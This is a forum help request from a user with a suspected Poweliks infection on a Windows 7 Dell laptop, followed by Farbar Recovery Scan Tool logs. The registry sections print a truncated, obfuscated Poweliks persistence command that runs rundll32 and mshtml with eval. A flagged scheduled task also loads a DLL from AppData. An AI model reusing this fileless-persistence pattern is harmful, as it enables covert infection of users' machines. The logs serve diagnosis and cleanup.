Jump to content

I think I have a POWELIKS virus


Recommended Posts

My Dell Latitude E4310 running Windows 7 Professional has been infected with some kind of virus.  The virus is using up system RAM and CPU...which causes the computer to run so slow it's almost useless.  When I pull up the Windows Task Manager I see that the CPU usage meter fluctuates in the 80's to 90's...if I click on the Processes tab I see that the processes that are being used are jumping all around.  Like the virus is causing random processes to run for short periods of time...but they are all adding up to almost 100% cpu usage.  It's hard to explain.  If I manually start closing the processes that are hogging the most CPU I can get my system to a useable state for a few minutes.  But the virus will eventually start running these random processes again.

 

I've run MBAM (free) and it doesn't find anything.  I've also ran Spybot and AVAST with nothing found. 

 

I've ran TDSSKILLER with nothing found.

 

I've ran ComboFix and it did find a POWELIKS virus which it said it deleted.  The computer worked fine for a few minutes until I ran MBAB again...then it started to do the same things as before.  The random processes started running and the CPU and RAM started going up to bad levels. 

 

So, I think I need some help. 

 

Right now the system is at 97% cpu and 77% Physical Memory...I'm going to close some processes.
After closing some processes I'm at 3% cpu and 38% Physical Memory.  So, I'm sending this email now.

 

Thanks,
-Chris Ferguson-

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-01-2015 01
Ran by User at 2015-01-24 17:32:50
Running from C:\Users\User\Desktop\Malware stuff
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.287 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5645 - AVG Technologies)
AVG 2015 (Version: 15.0.4273 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5645 - AVG Technologies) Hidden
CorelVHS3X86 (HKLM\...\{CB91D8EE-AAC8-4921-AFCB-DB700EEF9D9B}) (Version: 1.05.0000 - Corel)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell System Detect (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\73f463568823ebbe) (Version: 5.12.0.3 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1007.101.210 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.8 - Intel)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
OpenOffice 4.0.1 (HKLM\...\{47F460DA-D1BE-4D85-8DF2-AA1F31D3445F}) (Version: 4.01.9714 - Apache Software Foundation)
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2015 13:30:52 ComboFix created restore point
24-01-2015 17:17:02 Configured PowerDVD
24-01-2015 17:21:57 Revo Uninstaller's restore point - Battle.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:04 - 2015-01-24 16:03 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {24101962-EFCD-48A3-9588-FE6571943DD3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {2E82AEF7-774A-4868-BDA0-4176292D000C} - System32\Tasks\{EBC0B43D-34B9-407B-966A-63943AD95EE7} => C:\Program Files\Freemake\Freemake Video Converter\FreemakeVideoConverter.exe
Task: {4480FA26-0DE2-4425-8D00-BFBA97D00B67} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {534DD19A-C485-4F2C-8C31-A3D51C2B3CFD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {71519836-8433-4BC1-A669-7BFFA4D8575A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {A27C9E40-6522-4874-B404-6587317BB031} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {FE1E3EA7-3A55-42D9-B9F4-A40D5FDEA276} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-22] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-11-23 21:08 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-23 21:08 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-23 21:08 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-01-10 22:12 - 2012-01-10 22:12 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3179565126-1180787063-359821708-500 - Administrator - Disabled)
Guest (S-1-5-21-3179565126-1180787063-359821708-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3179565126-1180787063-359821708-1002 - Limited - Enabled)
User (S-1-5-21-3179565126-1180787063-359821708-1000 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2015 05:17:00 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {989c0791-8944-4af3-9e28-21583bc66cc7}

Error: (01/23/2015 00:59:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2328

Start Time: 01d0365772617e5f

Termination Time: 1607

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 02:30:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc292
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x119a4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 01:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x525b84d1
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0xcc44
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 10:01:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x3a14
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 09:04:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x17a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 08:10:52 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3880

Start Time: 01d035c7218aa0dd

Termination Time: 919

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 07:29:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x292c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 07:25:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc100
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x29bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/21/2015 09:10:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3a2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (01/24/2015 05:16:38 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (01/24/2015 05:16:35 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (01/24/2015 05:14:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:52:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:28:51 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The risdpcie service failed to start due to the following error:
%%193

Error: (01/24/2015 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Total Defense Common Scheduler Service service failed to start due to the following error:
%%2

Error: (01/24/2015 04:18:21 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Browser System Enahncer service to connect.

Error: (01/24/2015 04:15:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 560 @ 2.67GHz
Percentage of memory in use: 37%
Total physical RAM: 3509.86 MB
Available physical RAM: 2206.82 MB
Total Pagefile: 7018.01 MB
Available Pagefile: 5457.46 MB
Total Virtual: 2047.88 MB
Available Virtual: 1900.29 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:297.94 GB) (Free:201.3 GB) NTFS
Drive d: (RCT3) (CDROM) (Total:0.67 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: B3AF73EC)
Partition 1: (Active) - (Size=157 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

Here are my FARBAR Recovery Scan Tool files:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-01-2015 01
Ran by User (administrator) on USER-PC on 24-01-2015 17:32:12
Running from C:\Users\User\Desktop\Malware stuff
Loaded Profiles: User (Available profiles: User)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Creative Technology Ltd) C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(Dell) C:\Users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [292208 2010-06-04] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Dell Webcam Central] => C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)
HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3667472 2014-12-18] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [sDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\Run: [DellSystemDetect] => C:\Users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe [264488 2014-11-03] (Dell)
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OemReset.lnk
ShortcutTarget: OemReset.lnk -> C:\Windows\options\OemReset.exe (SoftThinks SAS)
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [s-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.foxnews.com/
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3179565126-1180787063-359821708-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
